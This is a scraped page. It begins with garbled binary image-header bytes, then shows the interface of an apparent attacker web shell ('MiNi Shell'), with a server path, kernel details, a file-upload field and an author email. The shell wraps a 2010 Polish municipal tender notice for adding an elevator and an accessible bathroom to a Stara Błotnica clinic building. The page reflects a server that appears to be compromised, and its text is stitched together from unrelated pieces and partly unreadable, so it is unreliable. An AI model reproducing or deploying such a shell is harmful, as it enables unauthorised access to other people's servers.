JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12662-N-2010.html

<p class="kh_header"><b>Stara Błotnica: Dobudowa windy do budynku SPZOZ wraz z dostosowaniem łazienki dla osób niepełnosprawnych położonej na działce o numerze ewidencyjnym 196/5 w miejscowości Stara Błotnica.</b><br>
<b>Numer ogłoszenia: 12662 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Starej Błotnicy , 46, 26-806 Stara Błotnica, woj. mazowieckie, tel. 048 385-77-90, faks 048 383-50-92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starablotnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dobudowa windy do budynku SPZOZ wraz z dostosowaniem łazienki dla osób niepełnosprawnych położonej na działce o numerze ewidencyjnym 196/5 w miejscowości Stara Błotnica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dobudowa windy do budynku SPZOZ wraz z dostosowaniem łazienki 
dla osób niepełnosprawnych

 
Zakres prac do wykonania;
1.Inwstycja polegająca na dobudowie windy do budynku SPZOZ w Starej Błotnicy 
Obiekt szybu windowego z przedsionkiem pełniącym rolę wiatrołapu i maszynownią.
Przewidziano komunikację zarówno z zewnątrz budynku jak i wewnątrz parteru na I piętro a zatem będzie dwuprzystankowa. Montaż  dżwigu  - dżwig hydrauliczny osobowy z maszynownią, udżwig -630 kg -8 osób, wysokość podnoszenia -do 10m,ilość przystanków -2, ilość dojść -3.
Powierzchnia użytkowa windy - 12,44 m2 , kubatura windy 91,8m3,powierzchnia zabudowy 19,54m2,wymiary kabiny - 110 x 140 cm. Projektowany obiekt zaprojektowano w technologii tradycyjnej jako wmurowany z cegły silikatowej pełnej lub cegły pełnej palonej gr.25 cm na zaprawie  cem-wap.
z dociepleniem zewnętrznym.
2.  Przystosowaniem pomieszczenia łazienki na I piętrze  dla osób niepełnosprawnych .
wymiana drzwi łazienkowych szt.1
wymiana instalacji wodno -kanalizacyjnej
wymiana instalacji elektrycznej
ułożenie glazury na ścianach
ułożenie terakoty
montaż stelaża muszli
montaż umywalki z szafką i baterią
montaż uchwytów przy umywalce i sedesie dla osób niepełnosprawnych.
Realizacja inwestycji winna być zgodna z posiadanym przez Zamawiającego projektem budowlanym,przedmiarem robót i specyfikacją techniczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.00-8, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium 6000 złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania
    oceny spełniania tych warunków;
5.1. Warunki ogólne
5.1.1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące 
warunki:
a) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp;
b) spełniają warunki zawarte w art. 22 ust. 1 ustawy Pzp.


5.2. Warunki szczegółowe udziału w postępowaniu, określone w oparciu  o art. 22 ust. 1 
pkt 1 -3 ustawy Pzp
5.2.1. Wykonawca musi wykazać, że:
a) dysponuje podstawową kadrą posiadającą uprawnienia budowlane (wymagane przez prawo bu-dowlane) do pełnienia samodzielnych funkcji w zakresie kierowania i nadzorowania robót w niżej podanych specjalnościach:
-architektoniczne lub konstrukcyjne lub architektoniczno-konstrukcyjne,: minimum 1 osoba,
-w zakresie robót  sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych; minimum 1 osoba
-w zakresie instalacji i urządzeń elektrycznych; minimum 1 osoba

b) dysponuje niżej podanymi,  w pełni sprawnymi i spełniającymi wymagania specyfikacji tech-nicznej, jednostkami podstawowych narzędzi i urządzeń  do wykonania zamówienia: betoniarka - szt 1, samochód dostawczy - szt 1.
Wykonawca może także wymienić alternatywny porównywalny technicznie sprzęt proponowany przez siebie dla danych robót, dołączając uzasadnienie swoich propozycji,

c)  zrealizował w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udziele-nie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom remontowo-budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie - wymagane jest wykonanie  minimum 1 z w/w robót o wartości nie mniejszej niż 180 000,00 PLN( sto osiemdziesiąt tysięcy złotych) ,

d) Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej,                                    w których posiadają rachunek potwierdzającą wysokość posiadanych środków finansowych                     lub zdolność kredytową na kwotę minimum  180 000,00 zł, wystawioną nie wcześniej niż 3 miesią-ce przed upływem terminu składania ofert.

e) posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności do wysokości minimum 50 000,00 PLN słownie: pięćdziesiąt tysięcy złotych). 

5.3. Sposób spełniania warunków w przypadku złożenia oferty przez podmioty występujące        wspólnie.
5.3.1. Wymagania określone w pkt 5.1.1.a) z wyjątkiem przesłanek wymienionych w art. 24 ust. 1 
pkt 10 i ust. 2 pkt 3 i 4 ustawy Pzp mają zastosowanie do wszystkich Wykonawców wspólnie ubiegają-cych się o udzielenie zamówienia (uczestników konsorcjum, spółki cywilnej).
Potwierdzenie spełniania warunków, o których mowa w pkt. 5.1. i 5.2. nastąpi w oparciu 
o dokumenty wymagane w specyfikacji istotnych warunków zamówienia, złożone w ofercie. Za-mawiający zastrzega sobie możliwość sprawdzenia prawdziwości złożonych w dokumentach in-formacji.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.
Wykonawca, który nie spełni chociażby jednego wymaganego od niego warunku zostanie wyklu-czony z postępowania o udzielenie zamówienia w oparciu o przesłanki zawarte w art. 24 ustawy Pzp.
Ofertę Wykonawcy wykluczonego uzna się za odrzuconą zgodnie z treścią art. 24 ust.4 ustawy Pzp.Wymagania wymienione w art. 24 ust. 1 pkt 10 i ust. 2 pkt 3 i 4 ustawy Pzp oraz określone w pkt 5.1.1.b) i 5.2. muszą być spełnione wspólnie lub przez poszczególnych Wykonawców oferty wspólnej.

5.4. Opis sposobu dokonywania oceny spełnianiania warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w 
celu potwierdzenia spełnienia warunków udziału w postępowaniu.

 6.1. Dla potwierdzenia spełniania warunków ogólnych określonych w pkt 5.1. niniejszej specyfika-cji, Wykonawcy winni przedłożyć niżej wymienione dokumenty:

         6.1.1. ( w formie załącznika  nr 1 ) Wypełniony druk oferty wraz z zaakceptowaniem oświadczeń i zobowiązań podanych w tym druku (sporządzić wg wzoru druku stanowiącego  załącznik nr 1 do niniejszej specyfikacji.

         6.1.2. ( w formie załącznika  nr 2 )  Kosztorys do oferty ( sporządzić wg przedmiaru robót )  
         (wg.branż) . Kosztorys ofertowy służy wyłącznie do zbadania realności oferowanej ceny.

6.1.3.  ( w formie załącznika  nr 3 )  Oświadczenie, że Wykonawca spełnia wymagania art. 22 ust. 1 ustawy Pzp oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp (sporządzić wg wzoru druku stanowiącego załącznik nr 4 do niniejszej specyfikacji).

6.1.4. ( w formie załącznika  nr 4 )  Aktualny odpis z właściwego rejestru albo aktualne zaświad-czenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

6.1.5. ( w formie załącznika  nr 5 )  Aktualne zaświadczenia właściwego naczelnika urzędu skar-bowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubez-pieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem po-datków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

6.1.6. ( w formie załącznika  nr 6 ) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy , wystawioną nie wcześniej niż 6 miesięcy przed upły-wem terminu składania ofert.  

6.1.7. ( w formie załącznika  nr 7 ) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy , wystawioną nie wcześniej niż 6 miesięcy przed upływem składania ofert.

6.1.8. ( w formie załącznika  nr 8 )  Dokument potwierdzający wniesienie wadium.

6.2. Dla potwierdzenia spełnienia warunków szczegółowych określonych w pkt 5.2. niniejszej spe-cyfikacji, Wykonawcy winni przedłożyć niżej wymienione dokumenty:
 
6.2.1. ( w formie załącznika  nr 9) Wykaz osób, którymi dysponuje lub będzie dysponował wyko-nawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z uprawnieniami budowlanymi i dokumentami potwierdzającymi przynależność do Krajowej Izby Inżynierów Budownictwa (spo-rządzić wg wzoru druku stanowiącego załącznik nr 5 do niniejszej specyfikacji). Informacje zawar-te w wykazie winny stanowić potwierdzenie spełnienia warunku podanego w pkt 5.2.1.a) niniejszej specyfikacji.

6.2.2. ( w formie załącznika  nr 10) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o których mowa w pkt 6.2.1. Wyko-nawca wskazał osoby, którymi będzie dysponował ( sporządzić wg wzoru druku stanowiącego za-łącznik nr 6 do niniejszej specyfikacji).

6.2.3. ( w formie załącznika  nr 11 ) Wykaz narzędzi i urządzeń, którymi dysponuje lub będzie dys-ponował Wykonawca  (sporządzić wg wzoru druku stanowiącego załącznik nr 7 do niniejszej specy-fikacji). Informacje zawarte w wykazie winny stanowić potwierdzenie spełnienia warunku podane-go w pkt 5.2.1.b) niniejszej specyfikacji.

6.2.4. ( w formie załącznika  nr 12 ) Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 6.2.3. Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował ( sporządzić wg wzoru druku stanowiącego załącznik nr 8 do niniejszej specyfikacji.

6.2.5. ( w formie załącznika  nr 13 ) Wykaz wykonanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadający swoim rodzajem i wartością robotom remontowo-budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wy-konania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (sporządzić wg wzoru druku stanowiącego załącznik nr 9 do niniejszej specyfikacji). Informacje za-warte w wykazie winny stanowić potwierdzenie spełnienia warunku podanego w pkt 5.2.1.c) niniej-szej specyfikacji.

6.2.6. ( w formie załącznika  nr 14 )  Informacje banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środ-ków finansowych lub zdolność kredytową Wykonawcy , wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Informacje zawarte w ww. dokumentach winny stanowić potwierdzenie spełnienia warunku podanego w pkt 5.2.1.d) niniejszej specyfikacji.

6.2.7. ( w formie załącznika  nr 15 )  Polisę, a w przypadku jej braku innego dokumentu potwier-dzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzo-nej działalności do wysokości minimum 50 000,00 PLN ( słownie: pięćdziesiąt tysięcy złotych). 
Dokument ten dotyczy i winien być dołączony tylko przez wybranego Wykonawcę w dniu podpi-sania umowy i ważny przez cały czas trwania zamówienia.
Informacje zawarte w ww. dokumentach  winny stanowić potwierdzenie spełnienia warunku poda-nego w pkt 5.2.1.e) niniejszej specyfikacji.

6.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wówczas dokumenty wymienione w pkt  6.1.1., 6.1.2., 6.1.8., oświadczenie wymienione w pkt. 6.1.3. oraz zobowiązanie w pkt 6.2.2. i w pkt. 6.2.4. winien przedłożyć w imieniu wszystkich Wykonawców ustanowiony pełnomocnik (lider).

Dokumenty wymienione w pkt 6.1.4., 6.1.5., 6.1.6., 6.1.7. winny być przedłożone przez każdego Wykonawcę ( uczestnika oferty wspólnej.
Dokumenty wymienione w pkt  6.2.1., 6.2.3., 6.2.5., 6.2.6., 6.2.7., winien przedłożyć w imieniu wszystkich Wykonawców ten lub ci, którzy zapewnią spełnienie w całości lub w części wymagane warunki.
Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika  (lidera) do re-prezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Wszelkie rozliczenia dotyczące realizowanego zamówienia będą dokonywane wyłącznie 
z pełnomocnikiem (liderem).

6.4. W przypadku składania oferty przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wymagane dokumenty Wykonawca składa zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19.05.2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być skła-dane (Dz. U. z 2006r. Nr 87, poz. 605).

6.5. Dokumenty, o których mowa w punktach 6 mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może żą-dać przedstawienia oryginału lub notarialne poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej praw-dziwości.
Dokumenty dotyczące wpłaty wadium należy złożyć zgodnie z pkt 8.2 niniejszej specyfikacji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starablotnica.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starej Błotnicy pokój 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 10:00, miejsce: Urząd Gminy w Starej Błotnicy pokój nr 12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com